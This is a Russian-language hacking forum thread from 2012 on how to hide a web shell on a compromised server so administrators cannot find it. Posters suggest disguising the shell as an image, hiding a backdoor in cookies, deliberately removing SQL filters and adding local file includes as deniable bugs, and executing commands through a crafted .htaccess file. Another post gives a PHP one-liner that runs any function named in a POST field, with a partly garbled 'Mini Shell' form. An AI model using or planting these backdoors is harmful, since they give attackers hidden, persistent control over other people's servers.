Просмотр полной версии : как спрятать веб шелл
такой вопрос, какие есть способы прятать шелл, чтобы админ его практически не мог найти на веб сервере?
Под изображение, с соответствующим расширением.
winstrool
27.09.2012, 20:17
Как не прячь шел от грамотного админа он все равно его найдет, а вот если предусмотреть уязвимую функцию или подправить сценарий убрав в определённых местах кавычки и фильтры, то случай на восстановление сохранится!
winstrool said:
Как не прячь шел от грамотного админа он все равно его найдет, а вот если предусмотреть уязвимую функцию или подправить сценарий убрав в определённых местах кавычки и фильтры, то случай на восстановление сохранится!
по подробнее разъясни
winstrool
27.09.2012, 20:45
убрать фильтрации в sql-запросах, поставить локальные инклуды, зарание найти лог с ошибками.
Cennarios
27.09.2012, 22:44
like this:
в родном варианте->
if( file_exists('/etc/passwd') && is_writeable('/etc/passwd')) echo 'done!';
и с поправкой на необязательность читаемости файла->
if( file_exists('/etc/passwd') || is_writeable('/etc/passwd')) echo 'done!';
В данном случае - подменя логического И на ИЛИ. Многоуважаемый Winstrool, как раз и имел ввиду подобные неявные методики.
Проще спрятать бекдор, да не какой нибудь, а чтобы в логах при обращений не отображался.
Да и после вставки самого бекдора, не забудьте изменить чмод и т.д.
Cennarios
28.09.2012, 16:48
Не проще. Кое-кто говорил, что все гениальное просто. Не надо никаких наворотов. Почти все бекдоры, в силу своей явной функциональности, легко палятся как визуально, так и всяческим софтом. Конечно, есть нюансы, но в большинстве случаев живут дольше именно баги, а не бэкдоры.
tickhack
28.09.2012, 22:26
Основы сокрытия шелла на сервере
Основы сокрытия шелла на сервере (http://all-hacking.net/showthread.php?t=705)
Cennarios said:
Не проще. Кое-кто говорил, что все гениальное просто. Не надо никаких наворотов. Почти все бекдоры, в силу своей явной функциональности, легко палятся как визуально, так и всяческим софтом. Конечно, есть нюансы, но в большинстве случаев живут дольше именно баги, а не бэкдоры.
ммм .. пока не разу не спалили мой бекдоры в куках а насчёт уязвимости, так она останется в логах
можно спрятать в gif формате
можно спрятать в .htaccess
PHP:
# Override default deny rule to make .htacc ess file accessible over web Order allow,d eny Allow from all # Make .htaccess fil e be interpreted as php file. This occur a fter apache has interpreted # the apache di rectoves from the .htaccess file AddType app lication/x-httpd-php .htaccess ###### SHELL ###### &1");?>###### LLEHS ###### domain/path/.htaccess?c=command
winstrool
03.10.2012, 21:56
Как вариант можно вот это куда ни буть залепить:
PHP:
if (isset($_POST[id]))stripslashes($_POST[fun]($_POST[id]));
а вот этим вызвать:
PHP:
Mini Shell v 0.1!
" method = "post">
Message text:
:
[/COLOR]
P.S: Если с толком подойти к вопросу, из этого мини шела такую конфетку можно забобахать! Уверен такими конфетками уже пользуются в тесных кругах).
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot